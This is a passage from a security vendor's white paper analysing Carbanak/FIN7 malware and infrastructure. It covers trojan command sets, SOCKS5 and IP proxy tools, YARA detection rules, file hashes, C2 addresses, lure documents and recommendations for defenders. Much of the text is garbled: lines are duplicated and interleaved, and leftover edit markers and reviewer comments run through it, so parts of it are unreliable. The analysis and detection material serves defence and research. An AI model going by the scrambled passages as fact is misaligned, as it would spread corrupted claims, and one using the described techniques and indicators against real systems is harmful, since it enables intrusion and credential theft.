information
#name
hostname
of victim
#wget
Download
function
via wget
HTTP
#info
system
information
#service
Install malware
Service with Service Name of
#wput
Upload
functionasviaWindows
wput FTP
WindowsCtlMonitor
#name
Get hostname of victim
#wget
#service
Deleted: M
Download function via wget HTTP
Install malware as Windows Service with Service Name of
WindowsCtlMonitor
#wput
Upload
functiondirectory
via wput
The malware also queries the user
default %TEMP%
looking
for the xname.txt file and
uploads to the C2 server. The malware does not create this file; therefore, its functionality remains
#name
Get hostname of victim
unknown
at this
(Figure
The malware
alsotime
queries
the 25).
user
s default %TEMP% directory looking for the xname.txt file and
uploads
to the C2 server. The malware
doesmalware
not create this
therefore,Service
its functionality
#service
Install
as file;
Windows
with remains
Service
unknown at this time (Figure 25).
Name of
WindowsCtlMonitor
The malware also queries the user
s default %TEMP% directory looking for
the xname.txt file and uploads to the C2 server. The malware does not create
this file; therefore, its functionality remains unknown at this time (Figure 25).
Deleted: M
Deleted:
Deleted:
WHITE PAPER
Figure 25: Malware Reading Unknown File
The malware beacons to 107.181.246[.]146 over TCP port 443 with a simple, single-byte XOR key that
FigureMalware
25: Malware Reading
Reading Unknown
File
Unknown
File
changes on every connection. Figure
The output
is a single-byte
command
output; the malware simply
malware
beacons toand
107.181.246[.]146
over TCP
port 443 with
a simple, single-byte
XOR key the
that #shell Deleted: sing
redirects The
STDIN,
STDOUT
STDERR across
the encoded
connection
when it receives
malware
beacons The
to 107.181.246[.]146
over
TCPoutput;
port 443
with asimply
simple,
changes
on every connection.
output is a single-byte XOR
command
the malware
Deleted:
command (Figure 26).
redirects STDIN,
STDOUT
STDERR
across
encoded
connection when
it receives
single-byte
key and
that
changes
ontheevery
connection.
outputtheis#shell
a singlecommand (Figure 26).
byte XOR command output; the malware simply redirects STDIN, STDOUT
and STDERR across the encoded connection when it receives the #shell
command (Figure 26).
Figure 26: Simple Command Shell
This Trojan may be detected with the YARA signature, below. RSA Research has not been able to locate
Figure
26:26:
Simple
Command
Shell
Figure
Simpleto
Command
Shell
any additional samples like this, making
it impossible
build a corpus
of variants to diff them in an
effort to identify what
s common.
Deleted:
This Trojan may be detected with the YARA signature, below. RSA Research
has not been able to locate any additional samples like this, making it
This Trojan may be detected with the YARA signature, below. RSA Research has not been able to locate
impossible to build a corpus of variants to diff them in an effort to identify
any additional samples like this, making it impossible to build a corpus of variants to diff them in an
what
s common.
effort to identify what
s common.
WHITE PAPER
YARA Signature for Go Trojan
rule Carbanak_Go_Trojan
meta:
author =
RSA FW
strings:
= { 4D 5A }
$build_id =
Go build ID:
33ee104ab2c9fc37c067a26623e7fddd3bb76302\
$string =
xname.txt
$sgc
2.16.840.1.113730.4.1
$msc
1.3.6.1.4.1.311.10.3.3
condition:
$mz at 0 and ($build_id or ($string and #sgc and $msc))
2.1.4. Linux and Other Tools
Carbanak/FIN7 operators are not confined to a compromised organization
Windows environment. While their goal is generally the Windows-based
machines, certain sub-groups are rather adept in the Linux world and have
used specialized tools to migrate from one to the other, as well as to maintain
persistence. The following SOCKS5 proxy tool is a strong example.
Carbanak/FIN7 Linux SOCKS5 Proxy
Name auditd
b57dc2bc16dfdb3de55923aef9a98401
SHA-1 1d3501b30183ba213fb4c22a00d89db6fd50cc34
Size
21.1 KB (21616 bytes)
Type
Magic ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically
linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
Name
Type
Address
Offset
Size Flags
NULL
NULL
0x00000000 0x00000000 0
.interp
PROGBITS 0x00400200 0x00000200 28
.note.ABI-tag
NOTE
0x0040021c 0x0000021c 32
.note.gnu.build-id
NOTE
0x0040023c 0x0000023c 36
.gnu.hash
GNU_HASH 0x00400260 0x00000260 36
.dynsym
DYNSYM
0x00400288 0x00000288 792
.dynstr
STRTAB
0x004005a0 0x000005a0 280
.gnu.version
VERSYM
0x004006b8 0x000006b8 66
.gnu.version_r
VERNEED
0x00400700 0x00000700 32
.rela.dyn
RELA
0x00400720 0x00000720 24
WHITE PAPER
The utility begins as a daemon and connects to 95.215.36[.]116 over TCP port
443. These values, as well as credentials, are hardcoded into the malware and
not obfuscated in any way (Figure 27).
Figure 27: Hardcoded SOCKS5 Proxy Information
Figure 27: Hardcoded SOCKS5 Proxy Information
Figure 27:
Hardcoded SOCKS5 Proxy Information
The credentials
are read from
locations,
sprintf()
%s:%s
%s:%s
base64and
encoded to
The credentials
are these
read from
thesecombined
locations,with
combined
with
sprintf()
credentials are read from
these(Figures
locations,28
combined
with sprintf()
%s:%s
and base64 encoded to
create the The
Authorization-Basic
string
and 29).
base64 encoded to create the Authorization-Basic string (Figures 28 and 29).
create the Authorization-Basic string (Figures 28 and 29).
Figure 28: Reading the Password
Figure 28: Reading the Password
Figure 28: Reading the Password
Figure 29: Reading the User ID
Figure
29: Reading the User ID
The SOCKS5 proxy obfuscates its traffic with a simple XOR loop. The same key is also used in another
one of their Windows IP forwarding tools, discussed later (Figure 30).
WHITE PAPER
Figure 29: Reading the User ID
SOCKS5
proxyitsobfuscates
a simple
loop.key
The SOCKS5The
proxy
obfuscates
traffic withitsa traffic
simplewith
loop. The
same
is also used in another
same
also
used
another
their
Windows
forwarding
tools,
one of their Windows IP forwarding tools, discussed later (Figure 30).
discussed later (Figure 30).
Figure
30:30:
Obfuscation
onTop
TopofofSOCKS5
SOCKS5
Proxy
Figure
Obfuscation on
Proxy
This Linux SOCKS5 proxy may be found with this YARA rule:
YARA Signature for Linux SOCKS5 Proxy
rule Carbanak_ELF_SocksTunnel
meta:
author =
RSA FW
strings:
$elf = { 7F 45 4C }
$s1 =
SendToTunnelSocks5Answer
$s2 =
SendToTunnel
$s3 =
process_out_data
$s4 =
process_in_data
$s5 =
update_tunnel_select_ex_cb
$s6 =
update_tunnel_descriptors
$s7 =
process_data_from_tunnel
$s8 =
UpdatePingTime
condition:
$elf at 0 and all of ($s*)
WHITE PAPER
A similar Windows utility,
svcmd.exe
, was discovered as well.
Carbanak/FIN7 Windows IP Proxy Tool
File Name: svcmd.exe
File Size: 47104 bytes
MD5:
8b3a91038ecb2f57de5bbd29848b6dc4
SHA1: 54074b3934955d4121d1a01fe2ed5493c3f7f16d
PE Time: 0x58CBC258 [Fri Mar 17 11:02:48 2017 UTC]
PEID Sig: Microsoft Visual C++ 8
Sections (5):
Name Entropy MD5
.text 6.57 80dd3bd472624a01e5dff9e015ed74fd
.rdata 5.44 b789b368b21d3d99504e6eb11a6d6111
.data 2.31 970056273f112900c81725137f9f8b45
.rsrc 5.1 44a70bdd3dc9af38103d562d29023882
.reloc 4.4 c99c03a1ef6bc783bb6e534476e5155b
This tool also has its configuration hardcoded into the malware and is plainly
visible in its strings (Figure 31).
Figure
31: Clearly Visible Network Information
Figure 31: Clearly Visible Network Information
Instead of a SOCKS5 proxy, this tool appears to directly forward packets to the IP address
185.86.151[.]174 on TCP port 443. It also uses a simple XOR obfuscation routine with the key of 0x41,
the same as the Linux SOCKS5 proxy (Figure 32).
WHITE PAPER
Instead of a SOCKS5 proxy, this tool appears to directly forward packets to
the IP address 185.86.151[.]174 on TCP port 443. It also uses a simple XOR
obfuscation routine with the key of 0x41, the same as the Linux SOCKS5
proxy (Figure 32).
Figure 32: IP Proxy Tool XOR Routine
Figure 32: IP Proxy Tool XOR Routine
WHITE PAPER
YARA Signature for Windows IP Proxy Tool
rule Carbanak_IP_Proxy
meta:
author =
RSA FW
strings:
= { 4D 5A }
$decoder = { 33 C0 EB 03 [0-3] 80 34 38 41 40 3B C6 75 F7 }
condition:
$mz at 0 and $decoder
The syndicate also utilizes several freely available reconnaissance, lateral
movement and privilege escalation tools, not to mention various Track data
memory scrapers and other financial data-gathering utilities discovered in the
wild. The table below enumerates the most common tools utilized by these actors.
Tool
Description
mimikatz
Password dumper; 32-bit or 64-bit
mimikatz-lite
Smaller version of mimikatz; 32-bit or 64-bit
invoke-minikatz
PowerShell version of mimikatz
System scrapers
Will return browser history and passwords, as well
as RDP and share information
WGET
GNU HTTP tool; Win32 and ELF
Network scanners
Simple scanners to quickly identify open ports on a
network segment
Compression utilities
RAR, 7zip, etc., renamed to compress exfil for faster
transmission, as well as fooling simple flow analysis
Log wipers
From batch scripts, bash scripts, PowerShell scripts
invoking WMIC commands to custom binaries
configured to wipe logs
Backdoored SSH and
SSHD daemons
Allows remote access with key-based authentication,
as well as exfiltrating all successful authentications to
a configured domain or IP on the internet
Lateral movement
tools
PSEXEC, PAExec, TinyP, Winexec for Linux;
allowing remote execution of arbitrary files with
stolen credentials from one machine on the
network to another
Remote
administration tools
Ammy admin; plink used to create reverse SSH
tunnel; various implementations of local proxies to
circumvent firewalls and network segmentation
WHITE PAPER
Known exploits
RTF, DOC, DOCX exploit lures; direct attacks on
web applications and external infrastructure to gain
a foothold in the network, as well as local privilege
escalation vulnerabilities for Linux and Windows
Table 1: Common Tools Used by Carbanak/FIN7
3. ANUNAK HISTORICAL OVERVIEW
The following figures were compiled from Anunak/Sekur samples acquired from
VirusTotal. They were initially sorted by compile time, but this proved problematic
as many had compile times zeroed out (resulting in a compile date of January 1,
1970) or were tampered with to infer future compile date. Consequently, the
samples were sorted by first submission to VirusTotal. The Trojans were often
hardcoded with domains and IP addresses with a port. New indicators appear on
the graph next to their submission date. Please note that no pDNS for the domains
was added to the timeline due to the compile time vs. submission time irregularities.
While there are many overlaps in infrastructure between 2014 (Figure 33)
into early 2015, the 2015 period (Figure 34) shows a dramatic slowdown in the
group
s activity. It is noteworthy that Kaspersky reported (in February 2015)
the group was responsible for stealing millions, if not billions, from banks during
2013 and 2014. Several months later, the authorities made high-profile arrests
on charges of ATM fraud and SWIFT transfers and other direct account transfers.
The observed lull in the group
s activity following this attribution and related
arrests indicates that some of the more prolific actors were either caught, ceased
their activity, moved on, or changed their TTPs and continued operations.
While each of these options is a possible truth, RSA Research believes that the
2015 curtailment of activity reflects Carbanak operators, still reeling from a law
enforcement takedown, reorganizing into a more loosely affiliated syndicate. As
mentioned previously, the graph shows net-new infrastructure, and it
s worth
it to note that in 2014 there were many different samples that communicated
with overlapping domains and IP addresses. The immense slowdown in 2015
in new indicators, and the fact that the samples observed stopped reusing or
overlapping domains and IPs, suggest a fragmentation
especially considering
that 2016 shows very little intersection of domains and IPs.
The 2016 period (Figure 35) shows an uptick in activity that included both reused and
new malware. This led us to believe the reorganized Carbanak syndicate recruited
new members, falling back on previously successful methods to exploit victim
networks after gaining a foothold. This aligns with RSA Incident Response team
s field
experience, where actors using these same tactics and tools were found to be using
custom or completely different Trojans than Carberp and Anunak/Sekur, post 2015.
The 2017 time period (Figure 36), while not yet over, is relatively sparse compared to
previous years, possibly indicating this malware is at the end of its lifecycle. It is likely,
given the history, some remnants of it will be recycled into another implant in the future.
WHITE PAPER
2/10/2014
3/1/2014
5/2/2014
mind-finder.com
6/23/2014
37.235.54.48:443
4/1/2014
7/2/2014
financialnewsonline.pw
185.10.56.59:443
7/6/2014
financialnewsonline.pw
5/1/2014
7/10/2014
great-codes.com
7/22/2014
datsun-auto.com
8/6/2014
androidn.net
8/12/2014
209.222.30.5:443
6/1/2014
7/1/2014
8/25/2014
nyugorta.com,
95.211.172.143:80
9/26/2014
87.236.210.109:443
10/1/2014
microso
c1pol361.com,
83.166.234.250:443
10/9/2014
get.bloody-roots.club,
83.166.234.250:443
10/15/2014
5.61.32.118:443,
66.55.133.86:80
10/20/2014
freemsk-dns.com,
87.98.153.34:443
10/23/2014
216.170.117.88:443
10/30/2014
systemsvc.net,
131.72.138.180:443
11/21/2014
onlineoffice.pw
11/28/2014
gendelf.com,
31.7.61.136:443
12/16/2014
comixed.org
162.221.183.109:443
8/1/2014
9/1/2014
10/1/2014
11/1/2014
2/10/2014
paradise-plaza.com,
188.138.98.105:700
3/5/2014
akamai-technologies.org,
158.58.172.157:700
4/24/2014
java-update.co.uk,
184.22.58.143:443
6/10/2014
adguard.name,
5.199.169.188:443
6/22/2014
public-dns.com,
58.158.177.102:80,
88.198.184.241:700
7/3/2014
87.236.210.109:443
7/3/2014
update-java.net
7/8/2014
public-dns.us
7/18/2014
travel-maps.info
7/31/2014
69.195.129.70:80
8/5/2014
di-led.com,
108.61.197.233:443,
108.61.197.254:80
8/22/2014
glonass-map.com,
88.198.184.241:443
9/7/2014
31.131.17.128:443
10/8/2014
worldnewsonline.pw,
185.10.56.59:443,
69.195.129.70:80
10/12/2014
31.131.17.125:443
10/19/2014
216.170.117.7:443
10/22/2014
coral-travel.com,
31.131.17.127:443
69.195.129.72:80
11/17/2014
microso
1povkjbdw87kgf518nl361.com,
131.72.138.180:443
11/25/2014
microso
jhecwhb7832873.com,
12/1/2014
12/31/2014
Figure 33: 2014 Infrastructure
81.17.17.42:443
12/8/2014
216.170.117.28:443,
94.100.180.200:80
12/24/2014
217.172.186.179:443,
85.143.166.76.80
WHITE PAPER
1/1/2015
2/26/2015
92.255.170.197:444
3/3/2015
playbe
ngx.net,
185.29.9.51:443
2/1/2015
3/1/2015
4/1/2015
5/5/2015
weekend-service.com,
216.170.116.120:443
2/23/2015
coral-trevel.com,
31.131.17.127:443,
69.195.129.72:80,
87.98.153.34:443
3/3/2015
193.203.48.41:700,
91.207.60.68:80
4/7/2015
77.88.55.77:80,
87.236.210.109:443
5/1/2015
5/14/2015
94.156.77.149:80
6/1/2015
6/2/2015
194.146.180.58:80,
87.98.217.9:443
7/1/2015
7/30/2015
185.29.9.28:443
8/1/2015
9/1/2015
8/31/2015
141.255.167.28:443
10/1/2015
10/9/2015
88.150.175.102:443
11/1/2015
10/21/2015
107.161.145.208:443,
62.75.218.45:80
10/14/2015
5.9.189.40:443
11/10/2015
194.146.180.58:80,
89.46.103.42:443
12/1/2015
12/31/2015
8/6/2015
82.163.78.188:443
Figure 34: 2015 Infrastructure
WHITE PAPER
1/1/2016
1/27/2016
149.202.138.110:443,
194.146.180.40:80
2/16/2016
194.146.180.40:80
2/23/2016
www.carenty44.net,
78.128.92.29:443
1/19/2016
social.strideindustrialusa.com
2/1/2016
3/1/2016
2/17/2016
www.draiklehfert.com,
151.80.8.10:443
4/1/2016
3/2/2016
www.crap
oerne.com,
216.170.118.136:443,
95.211.172.143:80
3/10/2016
107.161.159.17:443
4/5/2016
www.payrt.com,
185.29.11.7:443
4/25/2016
176.101.223.100:443,
194.146.180.41:80
5/27/2016
94.140.120.132:443,
95.215.46.70:443
6/30/2016
193.203.48.23:700,
89.144.14.65:80
5/1/2016
6/1/2016
7/1/2016
7/23/2016
138.201.44.10:443,
95.215.47.109:443
8/17/2016
great-codes.com,
public-dns.us,
wefwe3223wfdsf,
188.138.98.105:701,
37.235.54.48:443,
5.61.38.52:443
9/7/2016
ajlindustries.myfreesites.net
2/5/2016
23.249.162.161:443
3/21/2016
151.80.8.10:443
4/8/2016
185.86.149.60:443,
95.215.45.228:443
5/1/2016
www.sityahoogoodt.com,
151.80.241.83:443
5/25/2016
194.146.180.44:80
6/11/2016
updateserver.info
7/12/2016
179.43.140.82:443
8/1/2016
8/10/2016
46.165.228.24:443
9/1/2016
10/1/2016
9/4/2016
176.101.223.101:443,
194.146.180.43:80
9/12/2016
185.86.151.210:443,
204.155.30.87:443
11/1/2016
10/24/2016
204.155.30.100:443
12/1/2016
Figure 35: 2016 Infrastructure
WHITE PAPER
6/1/2017
6/26/2017
185.180.198.2:443
31.148.219.126:443
6/18/2017
176.101.223.105:443
7/1/2017
7/24/2017
7/19/2017
5.152.203.121:443
7/25/2017
shfdhghghfg.com,
52.11.125.44:443
Figure 36: 2017 Infrastructure
4. OVERLAP WITH COMMON CRIMEWARE CAMPAIGNS
During RSA Research
s analysis, an interesting link emerged to several crimeware
campaigns. This made sense, considering the prolific use of banker Trojans and
other information-stealing Trojans by these groups. The Anunak/Sekur malware
is the only unique family attributed to these groups. The rest are common,
repurposed malware. By pivoting on the known infrastructure with respect to when
the Trojans were active, RSA Research was able to discover a potential overlap.
Linked Sample
File Name: face85f789faec82197703e296bd0c872f621902624b34c
108f0460bc687ab70.exe
FILE SIZE: 204800 BYTES
MD5:
1E47E12D11580E935878B0ED78D2294F
SHA1: 8230E932427BFD4C2494A6E0269056535B9E6604
PE TIME: 0X534BD7C7 [MON APR 14 12:42:47 2014 UTC]
PEID SIG: MICROSOFT VISUAL C++ 8
SECTIONS (5):
NAME ENTROPY MD5
.TEXT
6.5 EAFBA59CAFA0E4FA350DFD3144E02446
.RDATA
7.77 25617CE39E035E60FA0D71C2C28E1BF5
.DATA
6.57 1284A97C9257513AAEBE708AC82C2E38
.RSRC
4.91 F6207D7460A0FBDDC2C32C60191B6634
.RELOC
4.01 2E7EEC2C3E7BA29FBF3789A788B4228E
The compile time of this sample does not appear to be tampered with. It
was submitted to VirusTotal on August 25, 2014, from Russia via a web
submission as
great1404_chelnok.exe.
The web submission, as well as a nonhash filename, suggests this was from the victim and not a researcher. This
would give the actor a possible dwell time of over four months, more than
enough time to accomplish their goals.
Name
Entropy MD5
.text
eafba59cafa0e4fa350dfd3144e02446
.rdata 7.77 25617ce39e035e60fa0d71c2c28e1bf5
.data 6.57 1284a97c9257513aaebe708ac82c2e38
.rsrc
4.91 f6207d7460a0fbddc2c32c60191b6634
.reloc 4.01 2e7eec2c3e7ba29fbf3789a788b4228e
WHITE PAPER
The compile time of this sample does not appear to be tampered with. It was submitted to VirusTotal on
August 25, 2014, from Russia via a web submission as
great1404_chelnok.exe.
The web submission, as
well as a non-hash filename, suggests this was from the victim and not a researcher. This would give the
actor a possible dwell time of over four months, more than enough time to accomplish their goals.
Deleted: V
Upon further
analysis,
we determined
the Trojan is Anunak
and is hardcoded
to use
theisHTTP
Upon
further
analysis,
we determined
the Trojan
is Anunak
hardcoded
communications method with the domain nyugorta.com (Figure 37).
Deleted:
to use the HTTP C2 communications method with the domain nyugorta.com
(Figure 37).
Deleted: th
Deleted: .
Deleted:
Deleted: 4
Deleted: nd
Deleted:
Deleted: th
FigureFigure
37: 37:
Anunak
Trojan
Beacon
Anunak Trojan
Beacon
Deleted: th
The domain resolved to 89.45.14[.]207 on February 2nd, 2014. Pivoting on
this
IP address
our research
to a domain,
resolved
The domain
resolvedled
to 89.45.14[.]207
on February
2, 2014. brazilian-love[.]org,
Pivoting on this IP addressthat
led our
research
domain,
brazilian-love[.]org,
that
resolved
this
between
April
2014,
December
5, 2014.
to this IP between April 8th, 2014 and December 5th, 2014. This fit within
This fit within our actor
s timeframe of April to August 2014. The WHOIS information indicated that
actor
s timeframe of April to August 2014. The WHOIS information
drake.lampado777@gmail.com registered this domain and 34 others in the same timeframe. Our"research"
indicated
that drake.lampado777@gmail.com registered this domain and 34
indicates"
Drake"Lampado
"is"a"pseudonym.
others in the same timeframe. Our research indicates
Drake Lampado
is a pseudonym.
Deleted:
Research into these domains revealed that many of them were involved
with common Crimeware campaigns, overlapping with some of the Hosting
provider subnets used by Carbanak/Fin7 during the same time (Table 2).
Note: the full, unobscured table is available in the Appendix.
Rd Domain
Malware
Involved
zaydo.website
zaydo.space
zaydo.co
akkso-dob.in
upatre
downloader
nikaka-ost.in
skaoow-loyal.xyz
akkso-dob.xyz
upatre
downloader
maorkkk-grot.xyz
upatre
downloader
skaoow-loyal.net
nikaka-ost.xyz
upatre
downloader
pasteronixca.com
corebot
pasteronixus.com
corebot
vincenzo-bardelli.com
corebot
marcello-bascioni.com
corebot
Links to Anunak
Deleted:
Deleted:
Comment
we"calling"o
attack?"""
Comment
we"are"not"a
Addedclarif
WHITE PAPER
namorushinoshi.com
corebot
chugumshimusona.com
corebot
wascodogamel.com
corebot
ppc-club.org
corebot
castello-casta.com
carberp
cameron-archibald.com
carberp
narko-cartel.com
andromeda
narko-dispanser.com
andromeda
dragonn-force.com
Resolved between
09/16/2015
01/08/2016 to
91.194.254.207 same subnet
as advetureseller.com and
others
Resolved between
02/04/2015
05/14/2016 to
91.194.254.207 same subnet
as advetureseller.com and
others
[obscured].com
gooip-kumar.com
badur
Resolved between
02/05/2015
04/17/2015 to
91.194.254.207 same subnet
as advetureseller.com and
others
casas-curckos.com
levetas-marin.com
badur
casting-cortell.com
[obscured].net
02/08/2015
04/29/2016,
91.194.254.207 same subnet
as advetureseller.com and
others
brazilian-love.org
baltazar-btc.com
road-to-dominikana.biz
corebot
ihave5kbtc.org
andromeda
ihave5kbtc.biz
andromeda
critical-damage333.org
Table 2: Links to Anunak/Sekur Malware
WHITE PAPER
The linked IP address, 91.194.254[.]207, is registered to dimeline.eu, a
European
sports
betting
site that
owns the
entire a91.194.254[.]0/23
address Comment [DC29]: Is"the"
The linked
IP address,
91.194.254[.]207,
is registered
to dimeline.eu,
European sports betting site that
criminals?"""Is"it"a"legitimate
owns the entire
space (Table
3). 91.194.254[.]0/23 address space (Table 3).
them"out?""
Comment [e30]: It
s"certa
entire"link"between"these"ac
crimeware"campaign.""The"I
available"for"anyone"to"see.
completely"invalidate"this"e
content."
Table 3: RIPETable
WHOIS
Information
for 91.194.254.0/24
3: RIPE WHOIS
Information for 91.194.254.0/24
As"noted"above,"many"of"the"samples"analyzed"also"had"domains"resolving"to"this"network"space"
As noted
above, many of the samples analyzed also had domains resolving to
(91.194.254/23)"during"the"2014O2015"time"period."Table"4"details"the"dimeline.eu"IP"addresses"of"these"
domains,"which"were"registered"in"such"a"way"as"to"better"blend"in"with"common"traffic."
this network
space (91.194.254/23) during the 2014-2015 time period. TableDeleted: ".
Deleted: Many of the samp
Domain
IP Address
Date
4 details
the dimeline.eu IP addresses
of these domains.
These domains are resolving to this network du
akamai-technologies.org
91.194.254.246
2/26/2014
often referred
to as lookalike
domains as they are registered
in such a way as Deleted: period (Table 4).
adventureseller.com
91.194.254.39
8/25/2014
androidn.net
91.194.254.39
7/3/2014
to mimic
other trusted or innocent
domains in an attempt
to go unnoticed.
travel-maps.info
91.194.254.38
7/4/2014
glonass-map.com
datsun-auto.com
Domain
di-led.com
coral-trevel.com
akamai-technologies.org
comixed.org
publics-dns.com
adventureseller.com
publics-dns.com
91.194.254.37
91.194.254.38
91.194.254.38
91.194.254.92
91.194.254.246
91.194.254.90
91.194.254.93
91.194.254.39
91.194.254.94
IP Address
7/17/2014
7/22/2014
8/4/2014
10/20/2014
2/26/2014
10/24/2014
2/25/2015
8/25/2014
2/25/2015
Date
Table 4: Overlaps with Anunak Infrastructure
androidn.net
91.194.254.39
7/3/2014
There is also a link to a Corebot campaign with attempts to sell Corebot source code on btcshop.cc by a
user named btcshop. This person claimed to be selling the Corebot source code, but was not the author,
travel-maps.info
91.194.254.38
7/4/2014
and linked to a google+ account for a Drake Lampado. A single post by this person was posted on
October 11, 2013. An article explaining the link is here.
glonass-map.com
91.194.254.37
7/17/2014
datsun-auto.com
91.194.254.38
7/22/2014
di-led.com
91.194.254.38
8/4/2014
coral-trevel.com
91.194.254.92
10/20/2014
comixed.org
91.194.254.90
10/24/2014
publics-dns.com
91.194.254.93
2/25/2015
publics-dns.com
91.194.254.94
2/25/2015
Table 4: Overlaps with Anunak Infrastructure
There is also a link to a Corebot campaign with attempts to sell Corebot
source code on btcshop.cc by a user named btcshop. This person claimed
to be selling the Corebot source code, but was not the author, and linked to
a google+ account for a Drake Lampado. A single post by this person was
posted on October 11, 2013. An article explaining the link is here.
Deleted:
Deleted:
Comment [DC34]: Not"su
individuals.""If"we"are"incorr
Comment [TJ35R34]: Ac
however,"as"noted"above,"D
Deleted: th
Deleted:
WHITE PAPER
These indirect links are not a smoking gun and may be coincidental. The
Dimeline network may have been vulnerable with many different groups/
actors using its infrastructure to host their malware. Differences in TTP also
These indirect links are not a smoking gun and may be coincidental. The Dimeline network may have
exist. For example, the Carbanak/FIN7 group used more than one of their
been vulnerable with many different groups/actors using its infrastructure to host their malware.
external IP
addresses
C2 the
applications,
only
Differences
in TTP
also exist.to
Forhost
example,
Carbanak/FIN7while
group we
usedwere
more than
oneable
of their
external
addresses
host
applications,
while
were
only
able
verify
single
address
verify a single IP address hosting Corebot by the Drake Lampado actor.
Deleted:
Deleted:
Deleted:
hosting Corebot by the Drake Lampado actor.
Deleted: F
That being said, it remains a possibility that the Carbanak/FIN7 actors run
That being said, it remains a possibility that the Carbanak/FIN7 actors run side campaigns, in addition to
sideAPT-style
campaigns,
inon
addition
to their
APT-style
on the industrial
their
attacks,
the industrial
verticals
dealing withattacks,
financial information
of interest.
Deleted: F
Deleted: A
verticals dealing with financial information of interest.
5. CURRENT
ACTIVITY
5.!Current
Activity
Recently there have been reports of weaponized DOCX and RTF files using
Recently
there embedded
have been reports
of weaponized
DOCXVisual
and RTF
files using
embedded
JavaScript
in macros
to drop
Basic
and JavaScript
PowerShell
payloads
macros to drop Visual Basic and PowerShell payloads (Figure 38). These lures allow Carbanak/FIN7 to
(Figure 38). These lures allow Carbanak/FIN7 to gain a foothold in a targeted
gain a foothold in a targeted network and move laterally to find financial data.
Deleted:
Deleted: F
network and move laterally to find financial data.
Figure 38: Weaponized DOCX and RTF Lures
Figure'38:'Weaponized'DOCX'and'RTF'Lures'
The many layers of string splitting and Base64 obfuscation in the lure
document
s VBA Macro reveal the Bateleur JavaScript backdoor (Figure 39).
Along with this Trojan is the tinymet Trojan stub from Metasploit (Figure 40),
as well as an encoded and compressed password-stealing DLL.
WHITE PAPER
The"many"layers"of"string"splitting"and"Base64"obfuscation"in"the"lure"document
s"VBA"Macro"reveal"the"
The"many"layers"of"string"splitting"and"Base64"obfuscation"in"the"lure"document
s"VBA"Macro"reveal"the"
Bateleur"JavaScript"backdoor"(Figure"39)."Along"with"this"Trojan"is"the"tinymet"Trojan"stub"from"
Bateleur"JavaScript"backdoor"(Figure"39)."Along"with"this"Trojan"is"the"tinymet"Trojan"stub"from"
Metasploit"(Figure"40),"as"well"as"an"encoded"and"compressed"passwordOstealing"DLL."
Metasploit"(Figure"40),"as"well"as"an"encoded"and"compressed"passwordOstealing"DLL."
Deleted: "
Deleted: "
Deleted: pa
Deleted: pa
Figure'39:'Bateleur'Machine'Enumeration'
Figure 39:
Bateleur Machine Enumeration
Figure'39:'Bateleur'Machine'Enumeration'
Figure'40:'Tinymet'Configuration'
FIGURE 40:
TINYMET CONFIGURATION
Figure'40:'Tinymet'Configuration'
Embedded#DLL#
Embedded#DLL#
File Name: stealer_component_refl.dll
File
Name: DLL
stealer_component_refl.dll
Embedded
File Size: 24576 bytes
File Size: 24576 bytes
MD5:
ddc9b71808be3a0e180e2befae4ff433
MD5:
ddc9b71808be3a0e180e2befae4ff433
File Name: stealer_component_refl.dll
SHA1:
996db927eb4392660fac078f1b3b20306618f382
SHA1:
996db927eb4392660fac078f1b3b20306618f382
Time:
0x58993DE6
Feb 07 03:24:22 2017 UTC]
File
Size:
24576
bytes [Tue
PE Time:
0x58993DE6
[Tue Feb 07 03:24:22 2017 UTC]
Sections (4):
Sections
(4):
MD5:
ddc9b71808be3a0e180e2befae4ff433
Name
Entropy MD5
Name
Entropy MD5
.text 996db927eb4392660fac078f1b3b20306618f382
6.05
e741daf57eb00201f3e447ef2426142f
SHA1:
.text
6.05
e741daf57eb00201f3e447ef2426142f
.rdata
5ecb9eb63e8ace126f20de7d139dafe8
.rdata
5ecb9eb63e8ace126f20de7d139dafe8
PE.data
Time: 0x58993DE6
[Tue Feb 07 03:24:22 2017 UTC]
1.54
732e6d3d7534da31f51b25506e52227a
.data
1.54
732e6d3d7534da31f51b25506e52227a
.reloc (4): 4.76
9f01b74c1ae1c407eb148c6b13850d28"
Sections
.reloc
4.76
9f01b74c1ae1c407eb148c6b13850d28"
Name Entropy MD5
.text 6.05 e741daf57eb00201f3e447ef2426142f
.rdata 4.3 5ecb9eb63e8ace126f20de7d139dafe8
.data 1.54 732e6d3d7534da31f51b25506e52227a
.reloc 4.76 9f01b74c1ae1c407eb148c6b13850d28
The script, using Reflective DLL Injection, loads this payload into memory
and executes it without first writing it to disk. When the DLL is executed it
writes itself to the AppData\Local\Temp\ directory of the user profile in which
it was executed. It then attempts to locate saved username and password
locations from approximately ten different web browsers, as well as saved
Outlook credentials. This is but one variant; other variants use a cobalt-strike
stager in place of the tinymet backdoor. This blog post from Icebrg contains a
spreadsheet with known IOC
WHITE PAPER
6. RECOMMENDATIONS
The security lifecycle is the foundation for securing a network against
external threats. But this foundation needs to be built upon and a culture of
attention to detail, proactive monitoring and looking for blind spots. This can
sometimes be tedious and seem unnecessary with the right mix of technology.
RSA Incident Response has weighed in on the current situation, given they
see the effectiveness of many different types of instrumentation and network
layouts. The key takeaway from that post is for defenders to programmatically
increase their visibility while decreasing a potential attacker
s visibility and
access to sensitive data in a continuous cycle. This shortens attacker dwell
time when a breach occurs and limits exposure to financial loss.
Preventing an intrusion cannot always be mitigated by thorough patching
and good IT hygiene, though. In one case, these actors were able to exploit
a vulnerability in an internet-facing web application. In this case, the
organization had a good patching regimen for their application servers;
however, the software was a package and one of the components had a
vulnerability that the vendor had not patched. While the story could have
ended there, it did not. The server was running a vulnerable Linux kernel,
allowing for escalated privileges using CVE-2016-5195, the
Dirty COW
copy-on-write vulnerability. The attackers quickly installed a backdoor SSH
and SSHD binary, but soon discovered the Linux environment used key-based
authentication. From here, the attackers abused the winbind service, which
allows Windows Active Directory authentication on Linux hosts, to quickly
pivot to the Windows environment and carry on with their mission.
This is often the case with defense; planning is made more complicated once
you consider zero-day exploits
previously unknown vulnerabilities in existing
software. There are, undoubtedly, many zero days yet to be discovered in
today
s commonly used software. So how is a defender to be effective with
the complexity of modern networks and software? By assuming a breach is
always underway. Hunt for indicators in network traffic and on hosts and look
for blind spots in that monitoring. At a minimum, an organization should log
privileged account usage remotely and know where credentials are stored.
Carbanak/FIN7 relies on variants of the mimikatz password-dumping
software. Active Directory software is a fantastic tool to centralize
authentication and access control, as well as manage endpoints. This also
benefits a potential attacker, often providing the proverbial
keys to the
kingdom
and an abstracted map of the network. The simplest reconnaissance
